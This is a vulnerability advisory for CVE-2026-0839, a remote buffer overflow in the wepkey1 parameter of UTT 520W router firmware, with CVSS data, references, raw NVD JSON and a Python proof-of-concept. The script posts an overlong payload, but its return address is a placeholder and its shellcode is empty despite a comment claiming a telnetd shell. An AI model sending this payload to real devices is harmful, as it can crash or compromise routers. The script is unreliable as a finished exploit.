CVE-2026-0839

Description

A weakness has been identified in UTT 进取 520W 1.7.7-180627. Affected is the function strcpy of the file /goform/APSecurity. Executing a manipulation of the argument wepkey1 can lead to buffer overflow. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:utt:520w_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:utt:520w:3.0:*:*:*:*:*:*:* - NOT VULNERABLE

UTT 进取 520W 1.7.7-180627

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-0839 PoC - UTT Router APSecurity Buffer Overflow
# Target: UTT 进取 520W firmware 1.7.7-180627
# Module: /goform/APSecurity

import requests
import sys

def exploit_utt_router(target_ip, target_port=80):
    """
    Exploit buffer overflow in APSecurity strcpy function via wepkey1 parameter
    """
    url = f"http://{target_ip}:{target_port}/goform/APSecurity"
    
    # Buffer overflow payload - 512 bytes to overflow the buffer
    # Adjust offset based on actual firmware version
    padding = b'A' * 508
    
    # Overwrite return address with our controlled address
    # In real exploit, replace with actual ROP gadget addresses
    rop_chain = b'\x42\x42\x42\x42'  # Placeholder for ROP gadget
    
    # Shellcode for MIPS architecture (execute telnetd on port 4444)
    shellcode = b''
    
    payload = padding + rop_chain + shellcode
    
    # Send malicious wepkey1 parameter
    data = {
        'wepkey1': payload.decode('latin-1'),
        'wepkey2': 'test',
        'security_mode': 'wep'
    }
    
    try:
        print(f"[*] Sending exploit payload to {url}")
        print(f"[*] Payload length: {len(payload)} bytes")
        
        response = requests.post(url, data=data, timeout=10)
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Exploit sent. Check if router is compromised.")
        
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    
    exploit_utt_router(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0839
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0839
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0839/
[4] VulDB https://vuldb.com/cve/CVE-2026-0839
[5] https://github.com/GUOTINGTING2297/cve/blob/main/1234/29.md
[6] https://vuldb.com/?ctiid.340439
[7] https://vuldb.com/?id.340439
[8] https://vuldb.com/?submit.729028

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0839", "sourceIdentifier": "[email protected]", "published": "2026-01-11T06:15:57.567", "lastModified": "2026-01-13T21:57:24.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in UTT 进取 520W 1.7.7-180627. Affected is the function strcpy of the file /goform/APSecurity. Executing a manipulation of the argument wepkey1 can lead to buffer overflow. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha identificado una debilidad en UTT ?? 520W 1.7.7-180627. Afecta a la función strcpy del archivo /goform/APSecurity. La ejecución de una manipulación del argumento wepkey1 puede conducir a un desbordamiento de búfer. El ataque puede realizarse de forma remota. El exploit se ha hecho público y podría utilizarse para ataques. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:520w_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.7-180627", "matchCriteriaId": "1ED9CE5B-AC0E-4C53-A084-7777D5050400"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:520w:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "DD42AC5F-531F-40FC-BD78-D20F298AF79A"}]}]}], "references": [{"url": "https://github.com/GUOTINGTING2297/cve/blob/main/1234/29.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.340439", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.340439", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.729028", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}